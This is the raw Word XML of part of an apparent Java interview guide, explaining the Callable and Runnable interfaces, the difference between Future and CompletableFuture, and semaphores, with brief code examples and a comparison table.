        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>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Callable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>java.util.concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> package and is similar to the Runnable interface but with some key differences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B3DC41" w14:textId="77777777" w:rsidR="00C0392A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C0392A" w:rsidP="00CA5DB8">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Callable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED7339B"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Returns a result</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Unlike Runnable, which returns void, Callable returns a result of a specified type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A802EE"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Can throw checked exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Callable.call() method can throw checked exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8658F5" w14:textId="5F9DC554" w:rsidR="00C0392A"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Used with ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> — It is typically used with ExecutorService to submit tasks asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7105DD" w14:textId="3EC728D3" w:rsidR="00F15A90" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15A90" w:rsidP="006F2B93">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D9EF6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urrent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C1691B"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9F6D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0761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B0441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59306B50"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91B0C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as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8B96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442CC9AE"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sk completed!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0541F354"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08C3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AF3A39"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sk</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A59714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s until result is ready</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645C739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CB087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utdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0FFE2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6F392A" w14:textId="0EF56DB0"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52016DC7" w14:textId="382E9567" w:rsidR="0089148E"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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDD577E" w14:textId="77777777" w:rsidR="0089148E" w:rsidRPr="00CE4B95" w:rsidRDefault="0089148E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="310" w:name="_Toc197867524"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is Runnable interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="310"/>
    </w:p>
    <w:p w14:paraId="15723B57" w14:textId="6114EA21" w:rsidR="0089148E" w:rsidRPr="00CE4B95"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CE4B95" w:rsidRDefault="00627C14">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Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>functional interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java, designed to represent a task that can be executed by a thread. It is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>java.lang</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> package</w:t>
      </w:r>
      <w:r w:rsidR="002F141B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ADC7BF"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Runnable is used to execute code concurrently in threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E75ABD2"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It does </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not return a value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cannot throw checked exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CECB395" w14:textId="05E1B1FB"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Often used when the task is simple and doesn't need a return result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B685E9B" w14:textId="77777777" w:rsidR="00627C14" w:rsidRPr="00CE4B95" w:rsidRDefault="00627C14" w:rsidP="00627C14">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Runnable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E020699"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Single Abstract Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC3EE73"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void run();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9FADEE"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Contains no parameters and does not return any result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E082EB"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Used to Define a Thread Task</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0B23CC"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Runnable is often used to define the code that should execute in a separate thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F692C50"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Does Not Return a Value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D5E5C9"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Unlike Callable, it doesn’t return any result or throw checked exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B374ACD" w14:textId="77777777" w:rsidR="00A43A45" w:rsidRPr="00CE4B95" w:rsidRDefault="00A43A45" w:rsidP="00A43A45">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18DD1914"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Can Be Passed to a Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7517CB8F" w14:textId="25233AB0" w:rsidR="00002561"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You can pass an instance of Runnable to a Thread constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB07BEE" w14:textId="2B1D7006" w:rsidR="00002561" w:rsidRPr="00CE4B95" w:rsidRDefault="00002561" w:rsidP="00002561">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060FE84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D91C1"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9DD5CEC"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2B256"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unning in a threa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45C0569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C6FEC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7FD6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31BA7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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECBB48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57D9B9E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30596A" w14:textId="112592C2"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1057FFBC" w14:textId="12B6AA6C" w:rsidR="00525850"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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFA9C1A" w14:textId="424DC926" w:rsidR="00525850" w:rsidRPr="00CE4B95" w:rsidRDefault="00525850" w:rsidP="00525850">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="311" w:name="_Toc197867525"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Future and CompletableFuture?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="311"/>
    </w:p>
    <w:p w14:paraId="45E835A6" w14:textId="3B5799B7" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="003577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sic Overview:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECCEC8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4699D054"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ask that will eventually complete and produce a result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D9FAAA"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3E3F93A2"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ubclass of Future that allows you to write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asynchronous code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280F85F8"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can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>explicitly completed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (via complete()) and can be used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>compose asynchronous tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769345F2"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synchronous Composition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEF405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784F58C"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upport chaining or combining asynchronous tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It only allows the retrieval of the result via blocking calls (e.g., get()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CCB374"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20D60CD"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chaining</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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bine multiple futures</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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n-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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pletion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3609CFA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16F0FE2"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the get() method to wait for the completion of the task, but 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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662998CB"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4D79E8D"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plete a CompletableFuture manually</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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supports more advanced features like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>handling exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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ception Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4BB8B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9FB5A85"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ture provides get() method, which throws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like ExecutionException or InterruptedException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACC5FB4"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is not as flexible as in CompletableFuture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D806FD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734FFAE0"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locking vs Non-blocking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708F09E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A7CE9AB"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 method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it will wait for the task to complete and then return the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651D28D9"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2AB503F8"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in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00A612B"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 Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69701C2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0CF52DB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83AC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4C24721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2D3A796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374F7CF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p>
    <w:p w14:paraId="7F79094E"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66FAC8"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AFB7D4"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ing call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2C0C7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5AE62F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BB47E6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C09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7D85F07F" w14:textId="69C69D92"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C17C7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 Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BC33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mpletable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Asy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0BB5DA"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0F4C4D1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5D83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15B5DCE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75E1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53121EC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2B02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289C7A1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603DD7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548277"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completableFuture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1DCD5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pp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ining another task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785B990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ccep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cessed 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6D0BCA7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ceptional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62EE0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cep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06516DD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60F4BD1" w14:textId="6D90F14C"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239EAA" w14:textId="5D116E2A" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="00DF3506">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B8AD01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CE4B95" w14:paraId="795EC64E" w14:textId="77777777" w:rsidTr="00DF3506">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="675D4D74"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w14:paraId="446BDA51" w14:textId="77777777" w:rsidTr="00DF3506">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43EA973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blocking (via methods like thenApply())</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w14:paraId="71333249" w14:textId="77777777" w:rsidTr="00DF3506">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78A32166"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manually completed using complete()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w14:paraId="1941C029" w14:textId="77777777" w:rsidTr="00DF3506">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="541D07D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le, with methods like exceptionally()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w14:paraId="5DFAABDA" w14:textId="77777777" w:rsidTr="00DF3506">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A759DB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haining of asynchronous tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w14:paraId="3AC603AF" w14:textId="77777777" w:rsidTr="00DF3506">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="749FA88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asynchronous workflows with composition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="598826F7"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74BBC21"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Future:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7D1522"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mpletableFuture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1282FCA5" w14:textId="570B6709" w:rsidR="00AF73EB" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="00AF73EB">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Pr="00CE4B9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6" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0706B412" w14:textId="472ECAE3" w:rsidR="00AF73EB" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="312" w:name="_Toc197867526"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Semaphore?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="312"/>
    </w:p>
    <w:p w14:paraId="1301C211" w14:textId="297A3064" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Key Concepts of Semaphore:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0366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er</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Types of Semaphores:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325CE0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Binary Semaphore</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also called Mutex):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301F07E5"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A binary semaphore has only two possible values: 0 or 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317E960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typically used to control access to a single shared resource, ensuring mutual exclusion (mutex).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604EB9C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hen the semaphore is 1, a thread can acquire it and change it to 0. When it is 0, other threads are blocked until the semaphore is released and its value is set back to 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473AC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ing Semaphore</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342B432D"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This type of semaphore can have any non-negative integer value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABCE8A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used to control access to a limited number of identical resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C36C15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ample Use Case of Semaphore:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5F05C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Code Example (in Java):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691837C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mport java.util.concurrent.Semaphore;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6120EDDD" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47521AF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public class SemaphoreExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E0595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rivate static final Semaphore semaphore = new Semaphore(3); // Allows 3 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D0CEAD" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25959BC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static void main(String[] args) throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77865F2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lastRenderedPageBreak/>
